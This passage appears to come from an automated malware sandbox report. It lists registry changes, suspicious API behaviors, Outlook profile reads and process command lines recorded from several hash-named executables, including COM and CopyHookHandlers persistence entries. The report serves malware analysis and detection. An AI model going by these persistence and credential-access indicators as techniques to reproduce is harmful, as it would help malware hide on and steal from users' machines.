| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2632 = "Norfolk Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\SmartScreenEnabled\ = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\PreferenceMACs\Default\extensions.settings\iglcjdemknebjbklcgkfaebgojjphkec = "97DF06469908D6AC9762D237429DCFC3036C2467920A16C48FAAA29907638D36" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000b5bbf15a1f1eda01 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4313#immutable1 = "Configure your Internet display and connection settings." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3811856890-180006922-3689258494-1000\{EC453CD8-A633-4515-8B4C-C1389CC77745} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings | C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-2#immutable1 = "Configure your telephone dialing rules and modem settings." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3001#immutable1 = "Sync files between your computer and network folders" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\26\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\9 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-4#immutable1 = "Device Manager" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 000000000600000004000000080000000500000001000000070000000300000002000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\.lang\ = "lang_auto_file" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4312#immutable1 = "Internet Options" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\7 = 640031000000000077570e7b10003230433836427e3100004c0009000400efbe77570b7b77570e7b2e00000090db01000000a800000000000000000000000000000058e2bd0032003000320033002d00310031002d00320031002d0031003900000018000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\appwiz.cpl,-160#immutable1 = "Uninstall or change programs on your computer." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\32\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-2#immutable1 = "Keep a history of your files" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx\ = "{2E927ADE-D054-3EEC-3838-31EC2C3651EB}" | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\鰀䆟縀䆁 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 = "Configure how speech recognition works on your computer." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307} | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202020202020202020202020202020202020202 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\WordCount.dll" | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 060000000400000008000000050000000100000007000000000000000300000002000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-1#immutable1 = "BitLocker Drive Encryption" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\32\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Mode = "6" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\32\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\IconSize = "48" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sud.dll,-1#immutable1 = "Default Programs" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-1#immutable1 = "User Accounts" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\26\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000090000000600000004000000080000000500000001000000070000000300000002000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-103#immutable1 = "Customize your keyboard settings, such as the cursor blink rate and the character repeat rate." | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "32" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\LogicalViewMode = "3" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\9\NodeSlot = "34" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 0700000006000000050000000400000003000000020000000100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\lang_auto_file\shell\Read | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-2#immutable1 = "Customize settings for the display of languages, numbers, times, and dates." | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\32\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\FFlags = "18874385" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\.lang | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\explorer.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Multimedia Platform\smss.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ghstve.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: SetClipboardViewer
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
"C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe"
C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
"C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe" -service -lunch
C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
"C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb993546f8,0x7ffb99354708,0x7ffb99354718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
